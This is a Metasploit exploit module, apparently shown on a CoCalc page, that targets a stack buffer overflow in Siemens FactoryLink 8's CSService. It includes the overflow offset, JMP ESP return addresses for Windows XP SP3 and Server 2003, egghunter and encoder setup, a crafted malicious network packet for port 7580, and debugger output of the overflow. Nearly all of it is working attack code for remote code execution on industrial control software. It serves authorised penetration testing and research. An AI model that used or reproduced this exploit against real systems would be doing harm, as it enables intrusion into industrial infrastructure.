CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = NormalRanking
8

9
  include Msf::Exploit::Remote::Tcp
10
  include Msf::Exploit::Egghunter
11

12
  def initialize(info={})
13
    super(update_info(info,
14
      'Name'           => "Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow",
15
      'Description'    => %q{
16
          This module exploits a vulnerability found on Siemens FactoryLink 8. The
17
        vulnerability occurs when CSService.exe processes a CSMSG_ListFiles_REQ message,
18
        the user-supplied path first gets converted to ANSI format (CodePage 0), and then
19
        gets handled by a logging routine where proper bounds checking is not done,
20
        therefore causing a stack-based buffer overflow, and results arbitrary code execution.
21
      },
22
      'License'        => MSF_LICENSE,
23
      'Author'         =>
24
        [
25
          'Luigi Auriemma <aluigi[at]autistici.org>',  #Initial discovery, poc
26
          'sinn3r',  #Metasploit (thx hal)
27
        ],
28
      'References'     =>
29
        [
30
          ['OSVDB', '72812'],
31
          ['URL', 'http://aluigi.altervista.org/adv/factorylink_1-adv.txt'],
32
          ['URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-11-091-01']
33
        ],
34
      'Payload'        =>
35
        {
36
          'BadChars' => "\x00\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8e\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9e\x9f",
37
          'StackAdjustment' => -3500,
38
          'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
39
          'EncoderOptions' => {'BufferRegister'=>'ECX'},
40
        },
41
      'DefaultOptions'  =>
42
        {
43
          'EXITFUNC' => "process",
44
        },
45
      'Platform'       => 'win',
46
      'Targets'        =>
47
        [
48
          [
49
            'Windows XP SP3',
50
            {
51
              'Offset' => 965,         #Offset to overwrite RETN
52
              'Ret'    => 0x7e4456f7,  #JMP ESP in USER32.dll
53
              'Max'    => 1400,        #Max buffer used
54
            }
55
          ],
56
          [
57
            'Windows Server 2003 SP0',
58
            {
59
              'Offset' => 965,
60
              'Ret'    => 0x77d20738,  #JMP ESP in USER32.dll
61
              'Max'    => 1400,
62
            }
63
          ]
64
        ],
65
      'Privileged'     => false,
66
      'DisclosureDate' => '2011-03-25'))
67

68
      register_options(
69
        [
70
          Opt::RPORT(7580)
71
        ])
72
  end
73

74
  #User input will get converted back to ANSCI with WideCharToMultiByte before vsprintf
75
  def to_unicode(text)
76
    output = ''
77
    (text.length).times do |i|
78
      output << text[i,1] << "\x00"
79
    end
80
    return output
81
  end
82

83
  def exploit
84

85
    #Modify payload
86
    #XP = Align EAX 0x3a bytes.  Win2k3SP0 = 0x0a bytes
87
    p  = "\x57"      #PUSH EDI
88
    p << "\x59"      #POP ECX
89
    p << ((target.name =~ /server 2003/i) ? "\xb0\x0a" : "\xb0\x3a")
90
    p << "\x30\xc1"  #XOR CL,AL
91
    p << payload.encoded
92

93
    #Meterpreter tends to fail because of it being mangled.  We use an egghunter
94
    #instead to ensure the payload's integrity.
95
    egg_options =
96
    {
97
      :checksum => true,
98
      :eggtag   => "W00T",
99
    }
100

101
    egghunter, p = generate_egghunter(p, payload_badchars, egg_options)
102

103
    #x86/alpha_mixed egghunter
104
    alpha_encoder = framework.encoders.create("x86/alpha_mixed")
105
    alpha_encoder.datastore.import_options_from_hash( {'BufferRegister'=>'ESP'} )
106
    egghunter = alpha_encoder.encode(egghunter, nil, nil, platform)
107

108
    sploit  = ''
109
    sploit << make_nops(4)
110
    sploit << p
111
    sploit << rand_text_alpha(965-sploit.length)
112
    sploit << [target.ret].pack('V*')
113
    sploit << egghunter
114

115
    sploit << rand_text_alpha(target['Max']-sploit.length)
116
    sploit = to_unicode(sploit)
117

118
    pkt  = "\x00\x00\x4c\x45\x4e\x00\x40\x0b\x00\x00\x00\x00\x00\x00\x99\x00\x00\x00\x04\x00"
119
    pkt << "\x00\x00\x01\x07\x00\x00\x0b\x31\x99\x62\x72\x6b\x01\x00\x00\x00\x02\x04\x00\x00"
120
    pkt << "\x00\x04\x00\x00\x00\x01\x07\x00\x00\x0b\x19\x99\x00\x00\x00\x06\x00\x00\x00\x03"
121
    pkt << "\x06\x00\x00\x0a\xf6\x11\x22\x33\x44"
122
    pkt << sploit
123
    pkt << "\x00\x00\x06\x00\x00\x00\x06\x11\x22\x33\x44\x00\x00\x04\x00\x00\x00\x04\x00\x00"
124
    pkt << "\x00\x01\x99\x99\x99"
125

126
    print_status("Sending malicious request to remote host...")
127

128
    connect
129
    sock.put(pkt)
130
    handler
131
    select(nil, nil, nil, 6)
132
    disconnect
133
  end
134
end
135

136
=begin
137
0:000> g
138
call vsprintf. Destination=0x0012ead0 Format=0x0043b92c Args=0x0012eedc
139
eax=0012eedc ebx=7c809a99 ecx=0043b92c edx=0012ead0 esi=0012eee8 edi=00000002
140
eip=0040b908 esp=0012eac4 ebp=0012fabc iopl=0         nv up ei pl nz na po nc
141
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
142
CSService+0xb908:
143
0040b908 ff15249b4400    call    dword ptr [CSService+0x49b24 (00449b24)] ds:0023:00449b24={msvcrt!vsprintf (77c3fe49)}
144

145
0:000> dc 0012ead0
146
0012ead0  65535343 63697672 43203a65 47534d53  CSService: CSMSG
147
0012eae0  73694c5f 6c694674 525f7365 2d205145  _ListFiles_REQ -
148
0012eaf0  6f685320 72694477 2c303d73 6c694620   ShowDirs=0, Fil
149
0012eb00  3d726574 6150202c 613d6874 61616161  ter=, Path=aaaaa
150
0012eb10  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
151
0012eb20  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
152
0012eb30  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
153
0012eb40  61616161 61616161 61616161 61616161  aaaaaaaaaaaaaaaa
154

155
=end
156

157